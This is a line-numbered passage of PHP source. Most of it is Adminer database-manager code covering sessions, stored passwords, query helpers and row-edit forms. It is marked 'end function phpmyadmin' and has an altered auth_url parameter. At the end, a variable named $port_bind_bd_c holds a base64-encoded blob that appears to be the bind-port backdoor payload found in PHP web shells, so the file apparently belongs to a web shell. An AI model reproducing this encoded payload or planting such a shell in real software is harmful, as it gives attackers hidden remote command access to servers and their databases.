  2213. echo "<fieldset><legend><a href='#fieldset-$t' onclick=\"".h($Se)."return !toggle('fieldset-$t');\">$Xd</a></legend><div id='fieldset-$t'".($mi?"":" class='hidden'").">\n";
  2214. }
  2215. function bold($Ua,$hb="") {
  2216. return ($Ua?" class='active $hb'":($hb?" class='$hb'":""));
  2217. }
  2218. function odd($J=' class="odd"') {
  2219. static $s=0;
  2220. if(!$J)
  2221. $s=-1;
  2222. return ($s++%2?$J:'');
  2223. }
  2224. function js_escape($Q) {
  2225. return addcslashes($Q, "\r\n'\\/");
  2226. }
  2227. function json_row($y,$X=null) {
  2228. static $Kc=true;
  2229. if($Kc)
  2230. echo "{";
  2231. if($y!="") {
  2232. echo ($Kc?"":",")."\n\t\"".addcslashes($y, "\r\n\t\"\\/").'": '.($X!==null?'"'.addcslashes($X, "\r\n\"\\/").'"':'null');
  2233. $Kc=false;
  2234. }else{
  2235. echo "\n}\n";
  2236. $Kc=true;
  2237. }
  2238. }
  2239. function ini_bool($vd) {
  2240. $X=ini_get($vd);
  2241. return (preg_match('~^(on|true|yes)$~i',$X)||(int) $X);
  2242. }
  2243. function sid() {
  2244. static $J;
  2245. if($J===null)
  2246. $J=(SID&&!($_COOKIE&&ini_bool("session.use_cookies")));
  2247. return $J;
  2248. }
  2249. function set_password($ii,$N,$V,$G) {
  2250. $_SESSION["pwds"][$ii][$N][$V]=($_COOKIE["adminer_key"]&&is_string($G)?array(encrypt_string($G,$_COOKIE["adminer_key"])):$G);
  2251. }
  2252. function get_password() {
  2253. $J=get_session("pwds");
  2254. if(is_array($J))
  2255. $J=($_COOKIE["adminer_key"]?decrypt_string($J[0],$_COOKIE["adminer_key"]):false);
  2256. return $J;
  2257. }
  2258.  
  2259. function q($Q) {
  2260. global $g;
  2261. return $g->quote($Q);
  2262. }
  2263.  
  2264. function get_vals($H,$e=0) {
  2265. global $g;
  2266. $J=array();
  2267. $I=$g->query($H);
  2268. if(is_object($I)) {
  2269. while($K=$I->fetch_row())
  2270. $J[]=$K[$e];
  2271. }
  2272. return $J;
  2273. }
  2274.  
  2275. function get_key_vals($H,$h=null,$th=0) {
  2276. global $g;
  2277. if(!is_object($h))
  2278. $h=$g;
  2279. $J=array();
  2280. $h->timeout=$th;
  2281. $I=$h->query($H);
  2282. $h->timeout=0;
  2283. if(is_object($I)) {
  2284. while($K=$I->fetch_row())
  2285. $J[$K[0]]=$K[1];
  2286. }
  2287. return $J;
  2288. }
  2289. function get_rows($H,$h=null,$n="<p class='error'>") {
  2290. global $g;
  2291. $tb=(is_object($h)?$h:$g);
  2292. $J=array();
  2293. $I=$tb->query($H);
  2294. if(is_object($I)) {
  2295. while($K=$I->fetch_assoc())
  2296. $J[]=$K;
  2297. }elseif(!$I&&!is_object($h)&&$n&&defined("PAGE_HEADER"))
  2298. echo $n.error()."\n";
  2299. return $J;
  2300. }
  2301. function unique_array($K,$w) {
  2302. foreach($w as $v) {
  2303. if(preg_match("~PRIMARY|UNIQUE~",$v["type"])) {
  2304. $J=array();
  2305. foreach($v["columns"] as $y) {
  2306. if(!isset($K[$y]))
  2307. continue 2;
  2308. $J[$y]=$K[$y];
  2309. }
  2310. return $J;
  2311. }
  2312. }
  2313. }
  2314. function escape_key($y) {
  2315. if(preg_match('(^([\w(]+)('.str_replace("_",".*",preg_quote(idf_escape("_"))).')([ \w)]+)$)',$y,$B))
  2316. return $B[1].idf_escape(idf_unescape($B[2])).$B[3];
  2317. return idf_escape($y);
  2318. }
  2319. function where($Z,$p=array()) {
  2320. global $g,$x;
  2321. $J=array();
  2322. foreach((array) $Z["where"] as $y=>$X) {
  2323. $y=bracket_escape($y, 1);
  2324. $e=escape_key($y);
  2325. $J[]=$e.($x=="sql"&&preg_match('~^[0-9]*\\.[0-9]*$~',$X)?" LIKE ".q(addcslashes($X, "%_\\")):($x=="mssql"?" LIKE ".q(preg_replace('~[_%[]~','[\0]',$X)):" = ".unconvert_field($p[$y], q($X))));
  2326. if($x=="sql"&&preg_match('~char|text~',$p[$y]["type"])&&preg_match("~[^ -@]~",$X))
  2327. $J[]="$e = ".q($X)." COLLATE ".charset($g)."_bin";
  2328. }
  2329. foreach((array) $Z["null"] as $y)
  2330. $J[]=escape_key($y)." IS NULL";
  2331. return implode(" AND ",$J);
  2332. }
  2333. function where_check($X,$p=array()) {
  2334. parse_str($X,$ab);
  2335. remove_slashes(array(&$ab));
  2336. return where($ab,$p);
  2337. }
  2338. function where_link($s,$e,$Y,$Ue="=") {
  2339. return "&where%5B$s%5D%5Bcol%5D=".urlencode($e)."&where%5B$s%5D%5Bop%5D=".urlencode(($Y!==null?$Ue:"IS NULL"))."&where%5B$s%5D%5Bval%5D=".urlencode($Y);
  2340. }
  2341. function convert_fields($f,$p,$M=array()) {
  2342. $J="";
  2343. foreach($f as $y=>$X) {
  2344. if($M&&!in_array(idf_escape($y),$M))
  2345. continue;
  2346. $Fa=convert_field($p[$y]);
  2347. if($Fa)
  2348. $J.=",$Fa AS ".idf_escape($y);
  2349. }
  2350. return $J;
  2351. }
  2352. function cookie($C,$Y,$ae=2592000) {
  2353. global $ba;
  2354. return header("Set-Cookie: $C=".urlencode($Y).($ae?"; expires=".gmdate("D, d M Y H:i:s",time()+$ae)." GMT":"")."; path=".preg_replace('~\\?.*~','',$_SERVER["REQUEST_URI"]).($ba?"; secure":"")."; HttpOnly; SameSite=lax",false);
  2355. }
  2356. function restart_session() {
  2357. if(!ini_bool("session.use_cookies"))
  2358. session_start();
  2359. }
  2360. function stop_session() {
  2361. if(!ini_bool("session.use_cookies"))
  2362. session_write_close();
  2363. }
  2364. function &get_session($y) {
  2365. return $_SESSION[$y][DRIVER][SERVER][$_GET["username"]];
  2366. }
  2367. function set_session($y,$X) {
  2368. $_SESSION[$y][DRIVER][SERVER][$_GET["username"]]=$X;
  2369. }
  2370. function auth_url($ii,$N,$V,$m=null) {
  2371. global $Wb,$pwd;
  2372. preg_match('~([^?]*)\\??(.*)~', remove_from_uri(implode("|",array_keys($Wb))."|username|".($m!==null?"db|":"").session_name()),$B);
  2373. return "$B[1]?".(sid()?SID."&":"").($ii!="server"||$N!=""?urlencode($ii)."=".urlencode($N)."&":"")."dm=$pwd&x=phpmyadmin&username=".urlencode($V).($m!=""?"&db=".urlencode($m):"").($B[2]?"&$B[2]":"");
  2374. }
  2375. function is_ajax() {
  2376. return ($_SERVER["HTTP_X_REQUESTED_WITH"]=="XMLHttpRequest");
  2377. }
  2378. function redirect($A,$pe=null) {
  2379. if($pe!==null) {
  2380. restart_session();
  2381. $_SESSION["messages"][preg_replace('~^[^?]*~','', ($A!==null?$A:$_SERVER["REQUEST_URI"]))][]=$pe;
  2382. }
  2383. if($A!==null) {
  2384. if($A=="")
  2385. $A=".";
  2386. header("Location: $A");
  2387. exit;
  2388. }
  2389. }
  2390. function query_redirect($H,$A,$pe,$Xf=true,$vc=true,$Cc=false,$sh="") {
  2391. global $g,$n,$b;
  2392. if($vc) {
  2393. $Sg=microtime(true);
  2394. $Cc=!$g->query($H);
  2395. $sh=format_time($Sg);
  2396. }
  2397. $Qg="";
  2398. if($H)
  2399. $Qg=$b->messageQuery($H,$sh);
  2400. if($Cc) {
  2401. $n=error().$Qg;
  2402. return false;
  2403. }
  2404. if($Xf)
  2405. redirect($A,$pe.$Qg);
  2406. return true;
  2407. }
  2408. function queries($H) {
  2409. global $g;
  2410. static $Rf=array();
  2411. static $Sg;
  2412. if(!$Sg)
  2413. $Sg=microtime(true);
  2414. if($H===null)
  2415. return array(implode("\n",$Rf),format_time($Sg)
  2416. );
  2417. $Rf[]=(preg_match('~;$~',$H)?"DELIMITER ;;\n$H;\nDELIMITER ":$H).";";
  2418. return $g->query($H);
  2419. }
  2420. function apply_queries($H,$T,$rc='table') {
  2421. foreach($T as $R) {
  2422. if(!queries("$H ".$rc($R)))
  2423. return false;
  2424. }
  2425. return true;
  2426. }
  2427. function queries_redirect($A,$pe,$Xf) {
  2428. list($Rf,$sh)=queries(null);
  2429. return query_redirect($Rf,$A,$pe,$Xf, false, !$Xf,$sh);
  2430. }
  2431. function format_time($Sg) {
  2432. return sprintf('%.3f s', max(0, microtime(true)-$Sg));
  2433. }
  2434. function remove_from_uri($nf="") {
  2435. return substr(preg_replace("~(?<=[?&])($nf".(SID?"":"|".session_name()).")=[^&]*&~",'', "$_SERVER[REQUEST_URI]&"), 0, -1);
  2436. }
  2437. function pagination($E,$Cb) {
  2438. return " ".($E==$Cb?$E+1:'<a href="'.h(remove_from_uri("page").($E?"&page=$E".($_GET["next"]?"&next=".urlencode($_GET["next"]):""):"")).'">'.($E+1)."</a>");
  2439. }
  2440. function get_file($y,$Jb=false) {
  2441. $Hc=$_FILES[$y];
  2442. if(!$Hc)
  2443. return null;
  2444. foreach($Hc as $y=>$X)
  2445. $Hc[$y]=(array) $X;
  2446. $J='';
  2447. foreach($Hc["error"] as $y=>$n) {
  2448. if($n)
  2449. return $n;
  2450. $C=$Hc["name"][$y];
  2451. $_h=$Hc["tmp_name"][$y];
  2452. $vb=file_get_contents($Jb&&preg_match('~\\.gz$~',$C)?"compress.zlib://$_h":$_h);
  2453. if($Jb) {
  2454. $Sg=substr($vb, 0, 3);
  2455. if(function_exists("iconv")&&preg_match("~^\xFE\xFF|^\xFF\xFE~",$Sg,$dg))
  2456. $vb=iconv("utf-16","utf-8",$vb);
  2457. elseif($Sg=="\xEF\xBB\xBF")
  2458. $vb=substr($vb, 3);
  2459. $J.=$vb."\n\n";
  2460. } else
  2461. $J.=$vb;
  2462. }
  2463. return $J;
  2464. }
  2465. function upload_error($n) {
  2466. $me=($n==UPLOAD_ERR_INI_SIZE?ini_get("upload_max_filesize"):0);
  2467. return ($n?'Unable to upload a file.'.($me?" ".sprintf('Maximum allowed file size is %sB.',$me):""):'File does not exist.');
  2468. }
  2469. function repeat_pattern($yf,$Yd) {
  2470. return str_repeat("$yf{0,65535}",$Yd/65535)."$yf{0,".($Yd%65535)."}";
  2471. }
  2472. function is_utf8($X) {
  2473. return (preg_match('~~u',$X)&&!preg_match('~[\\0-\\x8\\xB\\xC\\xE-\\x1F]~',$X));
  2474. }
  2475. function shorten_utf8($Q,$Yd=80,$Yg="") {
  2476. if(!preg_match("(^(".repeat_pattern("[\t\r\n -\x{10FFFF}]",$Yd).")($)?)u",$Q,$B))
  2477. preg_match("(^(".repeat_pattern("[\t\r\n -~]",$Yd).")($)?)",$Q,$B);
  2478. return h($B[1]).$Yg.(isset($B[2])?"":"<i>...</i>");
  2479. }
  2480. function format_number($X) {
  2481. return strtr(number_format($X, 0, ".",','), preg_split('~~u','0123456789', -1, PREG_SPLIT_NO_EMPTY));
  2482. }
  2483. function friendly_url($X) {
  2484. return preg_replace('~[^a-z0-9_]~i','-',$X);
  2485. }
  2486. function hidden_fields($Nf,$od=array()) {
  2487. while(list($y,$X)=each($Nf)) {
  2488. if(!in_array($y,$od)) {
  2489. if(is_array($X)) {
  2490. foreach($X as $Id=>$W)
  2491. $Nf[$y."[$Id]"]=$W;
  2492. } else
  2493. echo '<input type="hidden" name="'.h($y).'" value="'.h($X).'">';
  2494. }
  2495. }
  2496. }
  2497. function hidden_fields_get() {
  2498. echo (sid()?'<input type="hidden" name="'.session_name().'" value="'.h(session_id()).'">':''),(SERVER!==null?'<input type="hidden" name="'.DRIVER.'" value="'.h(SERVER).'">':""), '<input type="hidden" name="username" value="'.h($_GET["username"]).'">';
  2499. }
  2500. function table_status1($R,$Dc=false) {
  2501. $J=table_status($R,$Dc);
  2502. return ($J?$J:array("Name"=>$R));
  2503. }
  2504. function column_foreign_keys($R) {
  2505. global $b;
  2506. $J=array();
  2507. foreach($b->foreignKeys($R) as $q) {
  2508. foreach($q["source"] as $X)
  2509. $J[$X][]=$q;
  2510. }
  2511. return $J;
  2512. }
  2513. function enum_input($U,$Ia,$o,$Y,$lc=null) {
  2514. global $b;
  2515. preg_match_all("~'((?:[^']|'')*)'~",$o["length"],$he);
  2516. $J=($lc!==null?"<label><input type='$U'$Ia value='$lc'".((is_array($Y)?in_array($lc,$Y):$Y===0)?" checked":"")."><i>".'empty'."</i></label>":"");
  2517. foreach($he[1] as $s=>$X) {
  2518. $X=stripcslashes(str_replace("''","'",$X));
  2519. $cb=(is_int($Y)?$Y==$s+1:(is_array($Y)?in_array($s+1,$Y):$Y===$X));
  2520. $J.=" <label><input type='$U'$Ia value='".($s+1)."'".($cb?' checked':'').'>'.h($b->editVal($X,$o)).'</label>';
  2521. }
  2522. return $J;
  2523. }
  2524. function input($o,$Y,$r) {
  2525. global $g,$Oh,$b,$x;
  2526. $C=h(bracket_escape($o["field"]));
  2527. echo "<td class='function'>";
  2528. if(is_array($Y)&&!$r) {
  2529. $Da=array($Y);
  2530. if(version_compare(PHP_VERSION, 5.4)>=0)
  2531. $Da[]=JSON_PRETTY_PRINT;
  2532. $Y=call_user_func_array('json_encode',$Da);
  2533. $r="json";
  2534. }
  2535. $gg=($x=="mssql"&&$o["auto_increment"]);
  2536. if($gg&&!$_POST["save"])
  2537. $r=null;
  2538. $Xc=(isset($_GET["select"])||$gg?array("orig"=>'original'):array())+$b->editFunctions($o);
  2539. $Ia=" name='fields[$C]'";
  2540. if($o["type"]=="enum")
  2541. echo nbsp($Xc[""])."<td>".$b->editInput($_GET["edit"],$o,$Ia,$Y);
  2542. else {
  2543. $Kc=0;
  2544. foreach($Xc as $y=>$X) {
  2545. if($y===""||!$X)
  2546. break;
  2547. $Kc++;
  2548. }
  2549. $Re=($Kc?" onchange=\"var f = this.form['function[".h(js_escape(bracket_escape($o["field"])))."]']; if ($Kc > f.selectedIndex) f.selectedIndex = $Kc;\" onkeyup='keyupChange.call(this);'":"");
  2550. $Ia.=$Re;
  2551. $fd=(in_array($r,$Xc)||isset($Xc[$r]));
  2552. echo (count($Xc)>1?"<select name='function[$C]' onchange='functionChange(this);'".on_help("getTarget(event).value.replace(/^SQL\$/, '')",1).">".optionlist($Xc,$r===null||$fd?$r:"")."</select>":nbsp(reset($Xc))).'<td>';
  2553. $xd=$b->editInput($_GET["edit"],$o,$Ia,$Y);
  2554. if($xd!="")
  2555. echo $xd;
  2556. elseif(preg_match('~bool~',$o["type"]))
  2557. echo "<input type='hidden'$Ia value='0'>"."<input type='checkbox'".(in_array(strtolower($Y), array('1','t','true','y','yes','on'))?" checked='checked'":"")."$Ia value='1'>";
  2558. elseif($o["type"]=="set") {
  2559. preg_match_all("~'((?:[^']|'')*)'~",$o["length"],$he);
  2560. foreach($he[1] as $s=>$X) {
  2561. $X=stripcslashes(str_replace("''","'",$X));
  2562. $cb=(is_int($Y)?($Y>>$s)&1:in_array($X, explode(",",$Y), true));
  2563. echo " <label><input type='checkbox' name='fields[$C][$s]' value='".(1<<$s)."'".($cb?' checked':'')."$Re>".h($b->editVal($X,$o)).'</label>';
  2564. }
  2565. }elseif(preg_match('~blob|bytea|raw|file~',$o["type"])&&ini_bool("file_uploads"))
  2566. echo "<input type='file' name='fields-$C'$Re>";
  2567. elseif(($qh=preg_match('~text|lob~',$o["type"]))||preg_match("~\n~",$Y)) {
  2568. if($qh&&$x!="sqlite")
  2569. $Ia.=" cols='50' rows='12'";
  2570. else {
  2571. $L=min(12, substr_count($Y, "\n")+1);
  2572. $Ia.=" cols='30' rows='$L'".($L==1?" style='height: 1.2em;'":"");
  2573. }
  2574. echo "<textarea$Ia>".h($Y).'</textarea>';
  2575. }elseif($r=="json"||preg_match('~^jsonb?$~',$o["type"]))
  2576. echo "<textarea$Ia cols='50' rows='12' class='jush-js'>".h($Y).'</textarea>';
  2577. else {
  2578. $oe=(!preg_match('~int~',$o["type"])&&preg_match('~^(\\d+)(,(\\d+))?$~',$o["length"],$B)?((preg_match("~binary~",$o["type"])?2:1)*$B[1]+($B[3]?1:0)+($B[2]&&!$o["unsigned"]?1:0)):($Oh[$o["type"]]?$Oh[$o["type"]]+($o["unsigned"]?0:1):0));
  2579. if($x=='sql'&&$g->server_info>=5.6&&preg_match('~time~',$o["type"]))
  2580. $oe+=7;
  2581. echo "<input type='text' ".((!$fd||$r==="")&&preg_match('~(?<!o)int~',$o["type"])&&!preg_match('~\[\]~',$o["full_type"])?" type='number'":"")." value='".h($Y)."'".($oe?" data-maxlength='$oe'":"").(preg_match('~char|binary~',$o["type"])&&$oe>20?" size='40'":"")."$Ia>";
  2582. }
  2583. }
  2584. }
  2585. function process_input($o) {
  2586. global $b;
  2587. $u=bracket_escape($o["field"]);
  2588. $r=$_POST["function"][$u];
  2589. $Y=$_POST["fields"][$u];
  2590. if($o["type"]=="enum") {
  2591. if($Y==-1)
  2592. return false;
  2593. if($Y=="")
  2594. return "NULL";
  2595. return +$Y;
  2596. }
  2597. if($o["auto_increment"]&&$Y=="")
  2598. return null;
  2599. if($r=="orig")
  2600. return ($o["on_update"]=="CURRENT_TIMESTAMP"?idf_escape($o["field"]):false);
  2601. if($r=="NULL")
  2602. return "NULL";
  2603. if($o["type"]=="set")
  2604. return array_sum((array) $Y);
  2605. if($r=="json") {
  2606. $r="";
  2607. $Y=json_decode($Y, true);
  2608. if(!is_array($Y))
  2609. return false;
  2610. return $Y;
  2611. }
  2612. if(preg_match('~blob|bytea|raw|file~',$o["type"])&&ini_bool("file_uploads")) {
  2613. $Hc=get_file("fields-$u");
  2614. if(!is_string($Hc))
  2615. return false;
  2616. return q($Hc);
  2617. }
  2618. return $b->processInput($o,$Y,$r);
  2619. }
  2620. function fields_from_edit() {
  2621. global $Vb;
  2622. $J=array();
  2623. foreach((array) $_POST["field_keys"] as $y=>$X) {
  2624. if($X!="") {
  2625. $X=bracket_escape($X);
  2626. $_POST["function"][$X]=$_POST["field_funs"][$y];
  2627. $_POST["fields"][$X]=$_POST["field_vals"][$y];
  2628. }
  2629. }
  2630. foreach((array) $_POST["fields"] as $y=>$X) {
  2631. $C=bracket_escape($y, 1);
  2632. $J[$C]=array("field"=>$C,"privileges"=>array("insert"=>1,"update"=>1),"null"=>1,"auto_increment"=>($y==$Vb->primary));
  2633. }
  2634. return $J;
  2635. }
  2636. function search_tables() {
  2637. global $b,$g;
  2638. $_GET["where"][0]["op"]="LIKE %%";
  2639. $_GET["where"][0]["val"]=$_POST["query"];
  2640. $Tc=false;
  2641. foreach(table_status('', true) as $R=>$S) {
  2642. $C=$b->tableName($S);
  2643. if(isset($S["Engine"])&&$C!=""&&(!$_POST["tables"]||in_array($R,$_POST["tables"]))) {
  2644. $I=$g->query("SELECT".limit("1 FROM ".table($R), " WHERE ".implode(" AND ",$b->selectSearchProcess(fields($R), array())), 1));
  2645. if(!$I||$I->fetch_row()) {
  2646. if(!$Tc) {
  2647. echo "<ul>\n";
  2648. $Tc=true;
  2649. }
  2650. echo "<li>".($I?"<a href='".h(ME."select=".urlencode($R)."&where[0][op]=".urlencode($_GET["where"][0]["op"])."&where[0][val]=".urlencode($_GET["where"][0]["val"]))."'>$C</a>\n":"$C: <span class='error'>".error()."</span>\n");
  2651. }
  2652. }
  2653. }
  2654. echo ($Tc?"</ul>":"<p class='message'>".'No tables.')."\n";
  2655. }
  2656. function dump_headers($md,$ye=false) {
  2657. global $b;
  2658. $J=$b->dumpHeaders($md,$ye);
  2659. $lf=$_POST["output"];
  2660. if($lf!="text")
  2661. header("Content-Disposition: attachment; filename=".$b->dumpFilename($md).".$J".($lf!="file"&&!preg_match('~[^0-9a-z]~',$lf)?".$lf":""));
  2662. session_write_close();
  2663. ob_flush();
  2664. flush();
  2665. return $J;
  2666. }
  2667. function dump_csv($K) {
  2668. foreach($K as $y=>$X) {
  2669. if(preg_match("~[\"\n,;\t]~",$X)||$X==="")
  2670. $K[$y]='"'.str_replace('"','""',$X).'"';
  2671. }
  2672. echo implode(($_POST["format"]=="csv"?",":($_POST["format"]=="tsv"?"\t":";")),$K)."\r\n";
  2673. }
  2674. function apply_sql_function($r,$e) {
  2675. return ($r?($r=="unixepoch"?"DATETIME($e, '$r')":($r=="count distinct"?"COUNT(DISTINCT ":strtoupper("$r("))."$e)"):$e);
  2676. }
  2677. function get_temp_dir() {
  2678. $J=ini_get("upload_tmp_dir");
  2679. if(!$J) {
  2680. if(function_exists('sys_get_temp_dir'))
  2681. $J=sys_get_temp_dir();
  2682. else {
  2683. $Ic=@tempnam("","");
  2684. if(!$Ic)
  2685. return false;
  2686. $J=dirname($Ic);
  2687. unlink($Ic);
  2688. }
  2689. }
  2690. return $J;
  2691. }
  2692. function password_file($i) {
  2693. $Ic=get_temp_dir()."/adminer.key";
  2694. $J=@file_get_contents($Ic);
  2695. if($J||!$i)
  2696. return $J;
  2697. $Vc=@fopen($Ic, "w");
  2698. if($Vc) {
  2699. chmod($Ic, 0660);
  2700. $J=rand_string();
  2701. fwrite($Vc,$J);
  2702. fclose($Vc);
  2703. }
  2704. return $J;
  2705. }
  2706. function rand_string() {
  2707. return md5(uniqid(mt_rand(), true));
  2708. }
  2709. function select_value($X,$_,$o,$rh) {
  2710. global $b,$ba;
  2711. if(is_array($X)) {
  2712. $J="";
  2713. foreach($X as $Id=>$W)
  2714. $J.="<tr>".($X!=array_values($X)?"<td>".h($Id):"")."<td>".select_value($W,$_,$o,$rh);
  2715. return "<table cellspacing='0' border='1'>$J</table>";
  2716. }
  2717. if(!$_)
  2718. $_=$b->selectLink($X,$o);
  2719. if($_===null) {
  2720. if(is_mail($X))
  2721. $_="mailto:$X";
  2722. if($Pf=is_url($X))
  2723. $_=(($Pf=="http"&&$ba)||preg_match('~WebKit|Firefox~i',$_SERVER["HTTP_USER_AGENT"])?$X:"https://www.adminer.org/redirect/?url=".urlencode($X));
  2724. }
  2725. $J=$b->editVal($X,$o);
  2726. if($J!==null) {
  2727. if($J==="")
  2728. $J="&nbsp;";
  2729. elseif(!is_utf8($J))
  2730. $J="\0";
  2731. elseif($rh!=""&&is_shortable($o))
  2732. $J=shorten_utf8($J, max(0, +$rh));
  2733. else
  2734. $J=h($J);
  2735. }
  2736. return $b->selectVal($J,$_,$o,$X);
  2737. }
  2738. function is_mail($ic) {
  2739. $Ga='[-a-z0-9!#$%&\'*+/=?^_`{|}~]';
  2740. $Ub='[a-z0-9]([-a-z0-9]{0,61}[a-z0-9])';
  2741. $yf="$Ga+(\\.$Ga+)*@($Ub?\\.)+$Ub";
  2742. return is_string($ic)&&preg_match("(^$yf(,\\s*$yf)*\$)i",$ic);
  2743. }
  2744. function is_url($Q) {
  2745. $Ub='[a-z0-9]([-a-z0-9]{0,61}[a-z0-9])';
  2746. return (preg_match("~^(https?)://($Ub?\\.)+$Ub(:\\d+)?(/.*)?(\\?.*)?(#.*)?\$~i",$Q,$B)?strtolower($B[1]):"");
  2747. }
  2748. function is_shortable($o) {
  2749. return preg_match('~char|text|lob|geometry|point|linestring|polygon|string|bytea~',$o["type"]);
  2750. }
  2751. function count_rows($R,$Z,$Cd,$ad) {
  2752. global $x;
  2753. $H=" FROM ".table($R).($Z?" WHERE ".implode(" AND ",$Z):"");
  2754. return ($Cd&&($x=="sql"||count($ad)==1)?"SELECT COUNT(DISTINCT ".implode(",",$ad).")$H":"SELECT COUNT(*)".($Cd?" FROM (SELECT 1$H$bd) x":$H));
  2755. }
  2756. function slow_query($H) {
  2757. global $b,$Ah;
  2758. $m=$b->database();
  2759. $th=$b->queryTimeout();
  2760. if(support("kill")&&is_object($h=connect())&&($m==""||$h->select_db($m))) {
  2761. $Nd=$h->result(connection_id());
  2762. echo '<script type="text/javascript">var timeout = setTimeout(function () {ajax(\'', js_escape(ME), 'script=kill\', function () {}, \'token=',$Ah, '&kill=',$Nd, '\');}, ', 1000*$th, ');</script>';
  2763. } else
  2764. $h=null;
  2765. ob_flush();
  2766. flush();
  2767. $J=@get_key_vals($H,$h,$th);
  2768. if($h) {
  2769. echo "<script type='text/javascript'>clearTimeout(timeout);</script>\n";
  2770. ob_flush();
  2771. flush();
  2772. }
  2773. return array_keys($J);
  2774. }
  2775. function get_token() {
  2776. $Uf=rand(1, 1e6);
  2777. return ($Uf^$_SESSION["token"]).":$Uf";
  2778. }
  2779. function verify_token() {
  2780. list($Ah,$Uf)=explode(":",$_POST["token"]);
  2781. return ($Uf^$_SESSION["token"])==$Ah;
  2782. }
  2783.  
  2784.  
  2785. function on_help($ob,$Hg=0) {
  2786. return " onmouseover='helpMouseover(this, event, ".h($ob).",$Hg);' onmouseout='helpMouseout(this, event);'";
  2787. }
  2788. function edit_form($a,$p,$K,$Wh) {
  2789. global $b,$x,$Ah,$n;
  2790. $dh=$b->tableName(table_status1($a, true));
  2791. page_header(($Wh?'Edit':'Insert'),$n, array("select"=>array($a,$dh)),$dh);
  2792. if($K===false)
  2793. echo "<p class='error'>".'No rows.'."\n";
  2794. echo '<form action="" method="post" enctype="multipart/form-data" id="form">
  2795. ';
  2796. if(!$p)
  2797. echo "<p class='error'>".'You have no privileges to update this table.'."\n";
  2798. else {
  2799. echo "<table cellspacing='0' border='1' onkeydown='return editingKeydown(event);'>\n";
  2800. foreach($p as $C=>$o) {
  2801. echo "<tr><td>".$b->fieldName($o);
  2802. $Kb=$_GET["set"][bracket_escape($C)];
  2803. if($Kb===null) {
  2804. $Kb=$o["default"];
  2805. if($o["type"]=="bit"&&preg_match("~^b'([01]*)'\$~",$Kb,$dg))
  2806. $Kb=$dg[1];
  2807. }
  2808. $Y=($K!==null?($K[$C]!=""&&$x=="sql"&&preg_match("~enum|set~",$o["type"])?(is_array($K[$C])?array_sum($K[$C]):+$K[$C]):$K[$C]):(!$Wh&&$o["auto_increment"]?"":(isset($_GET["select"])?false:$Kb)));
  2809. if(!$_POST["save"]&&is_string($Y))
  2810. $Y=$b->editVal($Y,$o);
  2811. $r=($_POST["save"]?(string) $_POST["function"][$C]:($Wh&&$o["on_update"]=="CURRENT_TIMESTAMP"?"now":($Y===false?null:($Y!==null?'':'NULL'))));
  2812. if(preg_match("~time~",$o["type"])&&$Y=="CURRENT_TIMESTAMP") {
  2813. $Y="";
  2814. $r="now";
  2815. }
  2816. input($o,$Y,$r);
  2817. echo "\n";
  2818. }
  2819. if(!support("table"))
  2820. echo "<tr>"."<td><input type='text' name='field_keys[]' onkeyup='keyupChange.call(this);' onchange='fieldChange(this);' value=''>"."<td class='function'>".html_select("field_funs[]",$b->editFunctions(array(
  2821. "null"=>isset($_GET["select"])
  2822. )))."<td><input type='text' name='field_vals[]'>"."\n";
  2823. echo "</table>\n";
  2824. }
  2825. echo "<p>\n";
  2826. if($p) {
  2827. echo "<input type='submit' value='".'Save'."'>\n";
  2828. if(!isset($_GET["select"]))
  2829. echo "<input type='submit' name='insert' value='".($Wh?'Save and continue edit'."' onclick='return !ajaxForm(this.form, \"".'Saving'.'...",this)':'Save and insert next')."' title='Ctrl+Shift+Enter'>\n";
  2830. }
  2831. echo ($Wh?"<input type='submit' name='delete' value='".'Delete'."'".confirm().">\n":($_POST||!$p?"":"<script type='text/javascript'>focus(document.getElementById('form').getElementsByTagName('td')[1].firstChild);</script>\n"));
  2832. if(isset($_GET["select"]))
  2833. hidden_fields(array("check"=>(array) $_POST["check"],"clone"=>$_POST["clone"],"all"=>$_POST["all"]));
  2834. echo '<input type="hidden" name="referer" value="', h(isset($_POST["referer"])?$_POST["referer"]:$_SERVER["HTTP_REFERER"]), '">
  2835. <input type="hidden" name="save" value="1">
  2836. <input type="hidden" name="token" value="',$Ah, '">
  2837. </form>';
  2838. }
  2839. //end function phpmyadmin
  2840.  
  2841. function highlight_num($a){
  2842. $b=implode(range(0,count(file($a))),'<br />');
  2843. $c=highlight_file($a,true);
  2844. echo "<table><tr><td class=\"num\">\n$b\n</td><td>\n$c\n</td></tr></table>";
  2845. }
  2846.  
  2847. $port_bind_bd_c="bVNhb9owEP2OxH+4phI4NINAN00aYxJaW6maxqbSLxNDKDiXxiLYkW3KGOp/3zlOpo7xIY793jvf +fl8KSQvdinCR2NTofr5p3br8hWmhXw6BQ9mYA8lmjO4UXyD9oSQaAV9AyFPCNRa+pRCWtgmQrJE P/GIhufQg249brd4nmjo9RxBqyNAuwWOdvmyNAKJ+ywlBirhepctruOlW9MJdtzrkjTVKyFB41ZZ dKTIWKb0hoUwmUAcwtFt6+m+EXKVJVtRHGAC07vV/ez2cfwvXSpticytkoYlVglX/fNiuAzDE6VL 3TfVrw4o2P1senPzsJrOfoRjl9cfhWjvIatzRvNvn7+s5o8Pt9OvURzWZV94dQgleag0C3wQVKug Uq2FTFnjDzvxAXphx9cXQfxr6PcthLEo/8a8q8B9LgpkQ7oOgKMbvNeThHMsbSOO69IA0l05YpXk HDT8HxrV0F4LizUWfE+M2SudfgiiYbONxiStebrgyIjfqDJG07AWiAzYBc9LivU3MVpGFV2x1J4W tyxAnivYY8HVFsEqWF+/f7sBk2NRQKcDA/JtsE5MDm9EUG+MhcFqkpX0HmxGbqbkdBTMldaHRsUL ZeoDeOSFBvpefCfXhflOpgTkvJ+jtKiR7vLohYKCqS2ZmMRj4Z5gQZfSiMbi6iqkdnHarEEXYuk6 uPtTdumsr0HC4q5rrzNifV7sC3ZWUmq+LVlVa5OfQjTanZYQO+Uf";
